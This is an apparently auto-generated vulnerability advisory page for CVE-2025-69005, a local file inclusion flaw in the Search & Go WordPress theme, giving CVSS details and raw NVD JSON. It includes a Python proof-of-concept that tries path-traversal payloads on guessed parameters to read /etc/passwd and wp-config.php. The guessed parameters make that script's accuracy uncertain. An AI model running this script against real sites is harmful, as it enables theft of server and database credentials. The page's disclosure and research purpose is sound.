Security Vulnerability Report
中文
CVE-2025-69005 CVSS 8.1 HIGH

CVE-2025-69005

Published: 2026-01-22 17:16:16
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Search & Go search-and-go allows PHP Local File Inclusion.This issue affects Search & Go: from n/a through <= 2.8.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Search & Go Theme <= 2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69005 PoC - Search & Go LFI Vulnerability # Target: WordPress site using Search & Go theme <= 2.8 import requests import sys def exploit_lfi(target_url, filename='/etc/passwd'): """ Exploit local file inclusion vulnerability in Search & Go theme """ # Common vulnerable parameters in Search & Go theme vulnerable_params = ['page', 'file', 'template', 'theme_page'] for param in vulnerable_params: # Path traversal payload payload = f'../../../../../../{filename}' try: response = requests.get( target_url, params={param: payload}, timeout=10, verify=False ) # Check if file content was returned if response.status_code == 200: if any(marker in response.text for marker in ['root:', 'daemon:', filename.split('/')[-1]]): print(f'[+] LFI Success with parameter: {param}') print(f'[+] File: {filename}') print('-' * 50) print(response.text[:500]) return True except requests.RequestException as e: print(f'[-] Request failed: {e}') return False # Example: Read wp-config.php if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] exploit_lfi(target, 'wp-config.php') exploit_lfi(target, '/etc/passwd') else: print('Usage: python cve-2025-69005.py <target_url>')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69005", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:16.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Search & Go search-and-go allows PHP Local File Inclusion.This issue affects Search & Go: from n/a through <= 2.8."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en un programa PHP, vulnerabilidad 'Inclusión Remota de Ficheros PHP', en Elated-Themes Search &amp; Go search-and-go permite la inclusión local de ficheros PHP. Este problema afecta a Search &amp; Go: desde n/a hasta &lt;= 2.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}